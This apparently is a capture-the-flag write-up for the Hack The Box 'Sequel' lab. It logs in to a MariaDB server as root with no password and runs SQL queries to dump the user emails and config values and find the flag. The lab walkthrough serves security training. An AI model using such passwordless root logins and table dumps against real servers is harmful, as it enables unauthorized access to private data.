#####################
# Sources and Links #
#####################
https://www.mysqltutorial.org/mysql-cheat-sheet.aspx

#########
# TL,DR #
#########
Nmap shows a MariaDB service running.
mysql is used to log in with root access, no password needed.
mysql is used to query the SQL and find the flag.

########
# Hack #
########
┌──(ryan㉿kali)-[~/HackTheBox/Sequel]
└─$ mysql -u root -h 10.129.161.105
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 177
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |

MariaDB [(none)]> USE htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.048 sec)

MariaDB [htb]> SELECT * FROM users
    -> ;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | admin@sequel.htb |
|  2 | lara     | lara@sequel.htb  |
|  3 | sam      | sam@sequel.htb   |
|  4 | mary     | mary@sequel.htb  |
+----+----------+------------------+
4 rows in set (0.047 sec)

MariaDB [htb]> SELECT * FROM config
    -> ;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | <REDACTED FOR WALKTHROUGH>       |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |

########### 
# Learned #
###########
Using mysql commands:
SHOW DATABASES;
USE htb;
SHOW TABLES;
SELECT * FROM config
